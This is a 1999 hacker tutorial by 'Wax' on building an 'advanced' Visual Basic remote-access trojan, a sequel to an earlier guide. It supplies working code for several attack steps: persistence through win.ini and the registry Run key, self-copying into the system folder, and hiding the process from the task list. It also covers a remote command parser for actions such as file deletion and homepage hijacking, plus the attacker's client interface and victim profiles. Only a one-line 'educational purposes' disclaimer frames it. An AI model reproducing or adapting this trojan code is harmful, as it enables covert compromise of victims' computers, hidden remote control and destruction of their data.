HOW TO BUILD AN ADVANCED TROJAN _______________________ ===============================[ ultimate guide by Wax ] + MAY 1999 + +----------------------: i n c l u d e d :-+ | Chapter I: The Server | | - Autorun | | - Stealthing | | - String Recognition | | | | Chapter II: The Client | | - The Interface | | - User Status | | - Profiles | | | | Chapter III: General Information | | - Using Modules (.bas) | | - Guide 1 'bugs' | | - Credits & Resources | | - Shout-Outs | +------------------------------------------+ Don't forget to view this in notepad or access the txtdirectly in your browser, or it will looks bad, address is: www.respect-inc.com/wax/wax_trojan02.txt Before we kick of with the Guide or pherhaps small book, whatever u want to call it, some general information, or must-knows. *) This guide is not written for the newbie VB trojan writer ! If u are new to writing trojans, I suggest you read my 1st trojan Guide available at Planet-Source-Code.Com (More info at Resources) *) Although this guide is written and includes Source Code for Visual Basic (by MS) the 'ideas' or methods apply to other languages as well, I suggest u read this as well when you are an Delphi or C++ coder, even it was just for more some information or ideas. *) In This guide as told I assume u are not a newbie, I also assume u are familiar, or somewhat familiar with the following issues: - The Registry (From Windows) - Internet Programming (Sockets etc.) - Windows API - Strings/Integers/Variables Ok, I guess every active VB programmer has enough knowledge about this after somewhat a half or 3/4th of a year, if not, I can suggest some sites that might help u get going, and some books, check them out at the Chapter III: Credits & Resources. Now, we will, unlike Guide1 not create a and step through the process of an entirely new server, offcourse it;s possible, the code doesn't have to be done in this order, these are just 'sniplets' with explanation and they are somewhat a must for the advanced trojan. If u want to do the Administrator First skip this chapter and goto Chapter II. +------------------------------------------------------------------------+ + CHAPTER I: THE SERVER +------------------------------------------------------------------------+ + Auto-Start / Nestling +------------------------ One of the most scaring parts of the all famous Back Orifice, was the fact that is nestled itself and re-run every time u restarted your computer, for the non-techies, or even the medium computer user it was hard to locate / remote the back orifice server (mostly .exe in the win\sys ) but offcourse the aspect that made it run is the part of interest for us, I will explain 2 methods of letting the server re-run at auto-start ever- time. Using an INI File, and the Registry. * INI File. To let a program re-run every time at startup using an INI file, u have to modify the win.ini file which is located in your \Win now open win.ini find the header [windows] mostly on top of the INI and pherhaps there's already a program using the INI to auto-start, if so there will be a load=programpath\programexe value, e.g: [windows] load=C:\program files\adobe\photoshop5\gammaloader.exe now the Load is the one we need, below is code u should copy&paste in to the Servers MOdule (or make a new module and paste it in there) '--> WRITING TO INI FILES MODULE (.BAS) - < S T A R T > - Declare Function WritePrivateProfileString Lib "kernel32" Alias "WritePrivateProfileStringA" (ByVal lpApplicationname As String, ByVal lpKeyName As Any, ByVal lsString As Any, ByVal lplFilename As String) As Long Declare Function GetPrivateProfileInt Lib "kernel32" Alias "GetPriviteProfileIntA" (ByVal lpApplicationname As String, ByVal lpKeyName As String, ByVal nDefault As Long, ByVal lpFileName As String) As Long Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationname As String, ByVal lpKeyName As String, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long Global file Global appname Global Keyname Global value Public Sub writeini() Dim lpAppName As String, lpFileName As String, lpKeyName As String, lpString As String Dim U As Long lpAppName = appname lpKeyName = Keyname lpString = value lpFileName = file U = WritePrivateProfileString(lpAppName, lpKeyName, lpString, lpFileName) If U = 0 Then Beep End If End Sub '--> WRITING TO INI FILES MODULE (.BAS) - < E N D > - Ok, assuming you've done the above, we go to the forms code U might want to add a Sub or something, just see what u do with it, to write to the ini use the following code: '--> PUBLIC SUB TO WRITE TO THE INI FILE - < S T A R T > - Public Sub InstallINI Dim lpAppName As String, lpFileName As String, lpKeyName As String, lpString As String Dim Load As Long lpAppName = "windows" 'the header [windows] lpKeyName = "load" 'the setting load= lpString = App.Path & "\" & app.exename & ".exe" 'the value app.path lpFileName = "C:\windows\win.ini" Load = WritePrivateProfileString(lpAppName, lpKeyName, lpString, lpFileName) If Load = 0 Then Beep End If End Sub '--> PUBLIC SUB TO WRITE TO THE INI FILE - < E N D > - The lpString is something u might want to change, using the API u can recover the Win\Sys and copy your trojan there, and let the lpString be something like this: SystemPath\Yourname.exe And added measure might be to also let this code be called when the program get shut-down e.g. when windows shuts-down, so that, should the user have removed the line (load=..) it will be added again. * REGISTRY To let your program auto-start thru the registry as well, u also have to use some code, which u preferably should paste in the same module as the INI writing code, to keep it easy to manage. '--> WRITING TO THE REGISTRY MODULE (.BAS) - < S T A R T > - Option Explicit Public Const HKEY_CLASSES_ROOT = &H80000000 Public Const HKEY_CURRENT_USER = &H80000001 Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const HKEY_USERS = &H80000003 Public Const HKEY_PERFORMANCE_DATA = &H80000004 Public Const HKEY_CURRENT_CONFIG = &H80000005 Public Const HKEY_DYN_DATA = &H80000006 Public Const REG_SZ = 1 ' Unicode nul terminated string Public Const REG_BINARY = 3 ' Free form binary Public Const REG_DWORD = 4 ' 32-bit number Public Const ERROR_SUCCESS = 0& Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long Public Declare Function RegEnumKey Lib "advapi32.dll" Alias "RegEnumKeyA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpName As String, ByVal cbName As Long) As Long Public Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, lpReserved As Long, lpType As Long, lpData As Byte, lpcbData As Long) As Long Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long Public Sub CreateKey(hKey As Long, strPath As String) Dim hCurKey As Long Dim lRegResult As Long lRegResult = RegCreateKey(hKey, strPath, hCurKey) If lRegResult <> ERROR_SUCCESS Then ' there is a problem End If lRegResult = RegCloseKey(hCurKey) End Sub Public Sub SaveSettingString(hKey As Long, strPath As String, strValue As String, strData As String) Dim hCurKey As Long Dim lRegResult As Long lRegResult = RegCreateKey(hKey, strPath, hCurKey) lRegResult = RegSetValueEx(hCurKey, strValue, 0, REG_SZ, ByVal strData, Len(strData)) If lRegResult <> ERROR_SUCCESS Then 'there is a problem End If lRegResult = RegCloseKey(hCurKey) End Sub '--> WRITING TO THE REGISTRY MODULE (.BAS) - < E N D > - Ok, as u can see also this code has a Sub u can easily call and pass 'parameters' too.. this code is superbly easy to use, I've stripped some code u don't need for now, so let's just go to the actual registry part The Registry concists of top-levels with sub-dirs which contain settings with values the top-levels are: HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG HKEY_DYN_DATA We will be modifying in the HKEY_LOCAL_MACHINE part, open regedit.exe and browse along with the code HKEY_LOCAL_MACHINE -> Software -> Microsoft -> Windows -> CurrentVersion -> Run as u can now see there are some settings (probably) among them there is probably the 'SystemTray' with as value "SysTray.Exe", yes this is the SystemTray Windows starts, removing it will cause malfunction or some disabling. Now u can make an Sub in the form itself, like u might have done with the ini Public Sub InstallRegistry() SaveSettingString(HKEY_LOCAL_MACHINE), "Software\Microsoft\Windows\CurrentVersion\Run", "AppName", "AppExe.exe" End Sub Now the thing with the Registry is that if u don't want to define a complete path to the AppExe like C:\program\files\trojan\trojan.exe it has to be in the Windows\System now all u have to do is as told make sure the exe gets copied to the windows\system at form_load (offcourse, place a check there if there's already a file in the windows\sys with the name u want cuz that means it's already copied, and has no need to be copied again I will show u how to do this all below: '--> CODE FOR THE MODULE, TO GET THE WINDOWS SYSTEM DIRECTORY -START- Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Public Const MAX_PATH = 260 '--> CODE FOR THE MODULE, TO GET THE WINDOWS SYSTEM DIRECTORY -END- '--> CODE FOR THE FORM TO LOAD THE PATH OF THE SYSTEM DIR INTO A STRING -START- Public Function GetSystemPath() Dim strFolder As String Dim lngResult As Long strFolder = String(MAX_PATH, 0) lngResult = GetSystemDirectory(strFolder, MAX_PATH) If lngResult <> 0 Then GetSystemPath = Left(strFolder, InStr(strFolder, _ Chr(0)) - 1) Else GetSystemPath = "" End If End Function '--> CODE FOR THE FORM TO LOAD THE PATH OF THE SYSTEM DIR INTO A STRING -END- '--> CODE TO CHECK AND IF NEEDED INSTALL THE TROJAN -START- Validate_File(Systempath & "\AppExe.exe") '--> CODE TO CHECK AND IF NEEDED INSTALL THE TROJAN -END- '--> CHECK FOR FILE - < S T A R T > - Function Validate_File(ByVal FileName As String) As Integer On Error Resume Next Dim fileFile As Integer fileFile = FreeFile On Error Resume Next Open FileName For Input As fileFile If Err Then FileCopy App.ExeName, Systempath & "\AppExe.exe" Call InstallRegistry 'this calls for the Sub we made b4, it registers Else 'It's already there, the file opening 'sequence' worked End If End Function '--> CHECK FOR FILE - < E N D > - Ok With all the code above you can safely be sure that the trojan gets installed correctly. Now, offcourse installation is not the only thing a good trojan should have, it should by all means not-be-visile to the user, not in the TaskManager ('CTRL-ALT-DEL') List, and the Taskbar. This is the next part of Chapter I, called Stealthing. +------------------------------------------------------------------------+ + CHAPTER I: THE SERVER +------------------------------------------------------------------------+ + STEALTHING +------------------------ Stealthing is necessary to make sure the user doesn't see the program running when he checks his TaskManager, if it is visible the user might become suspicious and try to get rid of it, and he can ! if it's visible in the CTRl-ALT-DEL List he can remove it by double clicking it ! Now, the way to make sure it's not in there is by fooling windows, this can be done by pretending there's a screen-saver running, because that is a time that windows won't respond to ctrl-alt-del. Goto to your module, and add the following constants: Public Const RSP_SIMPLE_SERVICE = 1 Public Const RSP_UNREGISTER_SERVICE = 0 These are the constants of the Screen Saver (Simple Service) Also add the following DLL declarations somewere below: 'STEALTH DECLARATIONS -START- Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long Public Declare Function GetCurrentProcess Lib "kernel32" () As Long Public Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long 'STEALTH DECLARATIONS -END- Ok, now the above code (as u can see to the 'Public Const' have to come in an module (the same as the rest of the code will be fine) now at the top of the main FORMS code add these dimension's: '-< Dim pid As Long Dim reserv As Long '-> now the Sub to make your program actually hide from the Ctrl-Alt-Del (taskman) list is this: 'STEALTH SUB -START- Public Sub Stealth() pid = GetCurrentProcessId() reserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE) End Sub 'STEALTH SUB -END- Ok the stealth part is done, using the above 2 methods (Nestling & Stealthing) you're trojan's already at a higher lever, now for one of the most vital parts of a trojan, it's recognition engine of incoming commands, and not just comparing with a case but stripping parts, recognizing first 4 or alike read on.. +------------------------------------------------------------------------+ + CHAPTER I: THE SERVER +------------------------------------------------------------------------+ + STRING RECOGNITION +------------------------ So u arrived how nice.. Ok as described above u will know what u will be learning here; StringRecognition or as some like to refer to it the CommandRecognitionEngine what it merely does is get the incoming data from winsock (the strings) and check it's 1st 4 strings (or more or less offcourse) and check what command it has to execute when e.g. it finds that the 1st 4 are 'msg:' Ok, I will just provide the code here and do some explanation and offcourse usage methods, when to and when not to use this code. ' STRING RECOGNITION Dim data As String Dim NewString As String MainSock.GetData data If Left$(data, 4) = "msg:" Then NewString = Mid(data, 5, Len(data)) MsgBox (NewString), vbCritical, " " Else ' STRING RECOGNITION This code should be used on a Winsock_data arrival sub as u can see it first dims data & then newstring the Data String is to store the incoming (the original data) in and the new string is to store the 'manipulated' string in, e.g. the msgs text Now, what it does is it gets the data which is being sent and saves it in the dimenioned DATA string, then it checks if the 4 left string (left$) are "msg:", if so it will strip out the 1st 4 strings (msg:) and uses the rest as the msgs text it stores the new string (the txt) in NEWSTRING 'NewString = Mid(data, 5, Len(data)) It takes the 5th string to the last one (5, Len(data)) from the Data (original) string. and it displays a msgbox with as text NEWSTRING, which is the manipulated string or in other words, the original incoming data WITHOUTH the 'msg:' in front of it. now a tiny part of client programming, the client would send this in the following way say u have a txtbox in which the msg text comes (txtmessagetext) and people enter some text and press the 'send' or 'display' or 'whateveruwannause' button the code would be somewhat alike [sockname].senddata "msg:" & txtmessagetext.text now a little expansion on the message method, to display the different types of messageboxes u could use ms[x] were [x] represents one of the 4 regular default styles which are: * vbInformation * vbCritical * vbQuestion * vbExclamation u could do: msi = Message Informational msc = Message Critical msq = Message Question mse = Message Exclamation ok this is all for string recognition, i'll name some more things u can use this for below: the things hooked up behind are examples of format * Sending people to Urls (url:http://www.respect-inc.com e.g.) * Changing LocalHostname of remote computer (lhn:[yourname] owns u!) * Changing IE4+ startpafe (ies:[yourhomepage]) * Deleting files (del:C:\windows\welcome.exe) Ok this should have helped u out enough on this way. The above mentioned methods (ChangingLocal & Startpage) use the Registry. +------------------------------------------------------------------------+ + CHAPTER II: THE CLIENT +------------------------------------------------------------------------+ + The Interface +------------------------ With all my respect to the BO (back orifice) programmers, it's interface sucked, now it could be that I had an beta version or a test version but it looked unclear and vague, and since most Trojan Users are all WinX/NT users they are used to windows interface, and a form filled with 30 buttons looks a little bad as well if u ask me, so I dedicated a chapter to the Clients interface it's just a matter of oppinion and if u think the above I wrote is crap, skip this chapter and head on the next sub-chapter of THE CLIENT. Some might have read the wax_trojan.txt (my 1st guide) and it also included a part on interfaces. altho y'all prolly think i suck in ascii (u share my oppinion :) here's my lovely drawing again to demonstrate how u could make it: _________________________________________________________ |PROGRAM NAME______________________________________- [] x | |FILE_________ COMMANDS_____ HELP______________________| |Setup | |Shutdown | |About | | |Connect | |Reboot | |Help | | |Discconnect | |Open Cd-Rom | |------| | |Exit | |Close Cd-Rom | | |------------| |Messages | | | |-------------| | | | | | | | | | |_________________________________________________________| It's all very limited and u prolly want to include some more menus / functions oh by the way: planet source code viewers: go to this page: www.respect-inc.com/wax/guide2.txt and view it in plain text so the drawings look ok on the main form u might want to include always updated status and another golden rule, make sure the user always has a (visual if possible) clue of what is going on e.g. when sending a file use percentages or if possible a Gauge/Progressbar a layout of the above with the menus closed but with the information is here: _________________________________________________________ |PROGRAM NAME______________________________________- [] x | |FILE_________ COMMANDS_____ HELP______________________| | | | Remote Host: 127.0.0.1 | | Remote Port: 3948 | | Status: Connected | | Server V: v1.a | | Connected: 12:01:56 | | | | Upload ______________________ | | Progress: |||||||| 30%___________| | |_________________________________________________________| A lil' explanation for u possible newbies reading this guide and searching for visualizations :) Remote Host: the computer u are connected to (the comp. running the server) Remote Port: the port the server which is installed is listening too Status: The winsock's status (let a timer check every second for it's status) Server V: the version of the server that is it installed on the 'victim' Connected: the time length u are connected to the server Upload Progress: the progress of uploading a file to the remote HD. Remember, it doesn't have to look like this, it's just one of the many ways a trojan with a superb GUI is the one by my friend WACKeHACK it's called Forced Entry. Ok u prolly found this an worthless chapter, it doesn't contain much usefull information but it's important u have a quality VUI or GUI. +------------------------------------------------------------------------+ + CHAPTER II: THE CLIENT +------------------------------------------------------------------------+ + User Status +------------------------ This is a very very small chapter about the visualization of the status of the Client, as mentioned above the Winsock's status and the status when connecting Now all of u are probably to lazy to write the full code of the winsock's status so I just wrote it down 1 day and I included it here, copy & paste it if u wish it uses 3 controls, the winsock u want the status of (sock) a label were the status is printed on (lblstatus) and a timer which every second checks for the winsocks status (tmrstatus) ' STATUS CHECK OF WINSOCK Private Sub tmrStatus_Timer() If sock.state = 0 Then lblstatus.caption = "Closed" else If sock.state = 1 Then lblstatus.caption = "Open" else If sock.state = 2 Then lblstatus.caption = "Listening" else If sock.state = 3 Then lblstatus.caption = "Pending Connection" else If sock.state = 4 Then lblstatus.caption = "Resolving Host" else If sock.state = 5 Then lblstatus.caption = "Host Resolved" else If sock.state = 6 Then lblstatus.caption = "Connecting" else If sock.state = 7 Then lblstatus.caption = "Connected" else If sock.state = 8 Then lblstatus.caption = "Peer is closing Connection" else If sock.state = 9 Then lblstatus.caption = "Error" else End Sub That's all about that for now and prolly for a long time :0 U might want to give the client some sort of information on how many bytes he/she transfered, just mod the bytes into a string (let's say totalbytes) and display that in a label. +------------------------------------------------------------------------+ + CHAPTER II: THE CLIENT +------------------------------------------------------------------------+ + Profiles +------------------------ One of the quality options of the (newer) Netbus Trojan by cF that it had profiles or 'users'. The idea was that u could enter a name an IP & port and I believe some more information and it would store it in a profile and u could just double- click on it to connect to it, and the best thing was: 1. It could have multiple profiles 2. It saved the information of the profile (Registry/Ini) Now since we are making an advanced trojan, we are going to make a small profile system as well, we will use the Registry for it and the module at the 1st chapter of this guide will be quite usefull. First a small explanation on the system. We will allow the user to enter a name for the profile a description and assign an IP to it, offcourse the user should also have the ability to create more then 1 or be able to delete. People will enter the above information and press a button or something alike to create the actual profile, when they click several things have to be done 1st of all a key in the registry has to be made, somewhat like [HKEY_LOCAL_MACHINE]\Software\Yourname\TrojanName\Profiles then in that registry key we will store the new profiles information, for every profile we make a key, so that when we want to retrieve all profiles we can execute the GetAllKeys from the TrojanName\Profiles at form_load now we store the name as Name description as Desc and the Ip as Address here's a sample on how to create on with a reg file // Create Key (save as .reg) REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\YourName\TrojanName\Profiles\Profile 1] "Name"="Localhost" "Desc"="Local Host Ip" "Address"="127.0.0.1" // Create Key (save as .reg) Now implent this code into the same type of code as done in Chapter I: Nestling so that u create the profiles etc. whenever someone creates a profile now this part is done, but what to do when the program gets opened again and the user wants to connect to a profile he created? We have to get all the the keys that are in Yourname\TrojanName\Profiles\[all profiles] We use the same module as above, but this time we need the full version, this module can be found at Vb-World.Net, because u need to have GetAllKeys/Settings now the Module is very easy, so U just get all values and place 'm in a listbox e.g., make sure that when people click on a profile it connects to it, you could add a menu on rightclick and let people choose, like; -< The drawing shows a popup at profile 3 (yea ascii drawing ain't mah talent >- If you need more help on this part, mail me @: wax@respect-inc.com . . . . . . ___________ |Profile 1 | |Profile 2 | |Profile 3 | ||connect | | ||delete | | | -------- | |___________| +------------------------------------------------------------------------+ + CHAPTER III: GENERAL INFORMATION +------------------------------------------------------------------------+ + Using Modules +------------------------ I highly support the use of modules in VB, especially ones that easy the progress/process a lot. Say u wanted to check if a persons computer is running your server at a certain port, write a public function in a module that checks thru a sock control wether the port's opened. Since this might sound weird I'll show u a module called Module a form called frmmain a winsock called sock '< function in the module > Public Function CheckSrvr(Byval Ip As String) frmMain.Sock.remoteport = "3040" 'the standard port' frmMain.Remotehost = Ip frmMain.Connect End Function '< function in the module > now it's really easy to implent this, once u've got it done u can call it from anywere by typing the name of the module followed by CheckSrvr, e.g. Module.Checksrvr then u type a space and it will display that yellow bar u regular see when u typing properties or values for a Ocx, then just enter the adress in string format ("127.0.0.1") or say u are smart and u let the user enter an IP in a box to check it would be somewhat alike Modules.Checksrvr txtCheck.text really short. Other examples of were a module is very usefull: * unACE / unRAR Module by Compulsion Software * Registry Module by Vb-World.Net * Modules In Trojans In which u have the declars + functions on say opening a cd-rom, removing taskbar etc. +------------------------------------------------------------------------+ + CHAPTER III: GENERAL INFORMATION +------------------------------------------------------------------------+ + Guide 01 'bugs' +------------------------ As some of u might have noticed, the 1st guide had some bugs / mistakes Known bugs for now are: - "David Appleman's book on Win32 API" -> Dan Appleman's book on Win32 API - x = mciexecute("play c:\sound.wax") -> x = mciexecute("play c:\sound.wav") - I forgot to include the part on laying the connection between server & client, which is a big mistake of me, so here is the 'correction' at Winsock_ConnectionRequest add the following code: '-> correctional code If Winsock1.State <> sckClosed Then winsock1.Close winsock1.Accept requestID '-> correctional code +------------------------------------------------------------------------+ + CHAPTER III: GENERAL INFORMATION +------------------------------------------------------------------------+ + Credits & Resources +------------------------ This Guide on how to write trojans is (C) by Wax 1999 You can contact me at wax@progenic.com _ __ ___ __ __ / / \ \ / _ \ \ \ / / / / _ \ \ / /_\ \ \ \./ / \ \/ \/ // / \ \/ / \ \ \_/ \_//_/ /_/_/ \_\ This guide is the sequel to the 1st guide, which was distributed under the name "wax_trojan.txt" It can be found at http://source.morphed.net/archive.asp?textware Sites: - Planet Source Code [ www.planet-source-code.com ] - Programmers Heaven [ www.programmersheaven.com ] - Progenic Security [ www.progenic.com ] - MorphedNet [ www.morphed.net ] Books: - Visual Basic 5.0 Developers Workshop - MSPRESS - Hardcore Visual Basic - MSPRESS - Win32 API - MSPRESS +------------------------------------------------------------------------+ + CHAPTER III: GENERAL INFORMATION +------------------------------------------------------------------------+ + Shout Outs +------------------------ Everlasting greets to Mucky Shouts to: Ph3wl, Progen, Phish, Blade,f i r e h a w k, Web-Junkie And the rest of the Progenic Security Team . . . . . . Got Comments, Suicidal notes, criticism, mail me at wax@progenic.com This guide is for educational purposes and, do not use provided knowledge for any malicious intent